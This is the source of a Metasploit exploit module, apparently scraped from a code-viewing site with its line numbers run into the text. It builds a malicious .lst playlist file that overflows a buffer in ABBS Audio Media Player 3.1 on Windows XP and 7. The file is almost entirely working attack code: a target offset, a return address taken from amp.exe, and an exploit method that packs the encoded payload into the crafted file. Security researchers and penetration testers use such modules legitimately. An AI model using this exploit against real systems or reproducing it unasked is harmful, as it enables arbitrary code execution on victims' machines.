Path: blob/master/modules/exploits/windows/fileformat/abbs_amp_lst.rb
19592 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::FILEFORMAT910def initialize(info = {})11super(12update_info(13info,14'Name' => 'ABBS Audio Media Player .LST Buffer Overflow',15'Description' => %q{16This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability17occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges18of the user running the application. This module has been tested successfully on19ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.20},21'License' => MSF_LICENSE,22'Author' => [23'Julian Ahrens', # Vulnerability discovery and PoC24'modpr0be <modpr0be[at]spentera.com>' # Metasploit module25],26'References' => [27[ 'OSVDB', '75096' ],28[ 'EDB', '25204' ]29],30'DefaultOptions' => {31'EXITFUNC' => 'process',32},33'Platform' => 'win',34'Payload' => {35'BadChars' => "\x00\x0a\x0d",36'DisableNops' => true,37},38'Targets' => [39[40'ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1',41{42'Ret' => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe43'Offset' => 4108,44}45]46],47'Privileged' => false,48'DisclosureDate' => '2013-06-30',49'DefaultTarget' => 0,50'Notes' => {51'Reliability' => UNKNOWN_RELIABILITY,52'Stability' => UNKNOWN_STABILITY,53'SideEffects' => UNKNOWN_SIDE_EFFECTS54}55)56)5758register_options(59[60OptString.new('FILENAME', [ false, 'The file name.', 'msf.lst']),61]62)63end6465def exploit66buffer = payload.encoded67buffer << rand_text(target['Offset'] - (payload.encoded.length))68buffer << [target.ret].pack('V')6970file_create(buffer)71end72end737475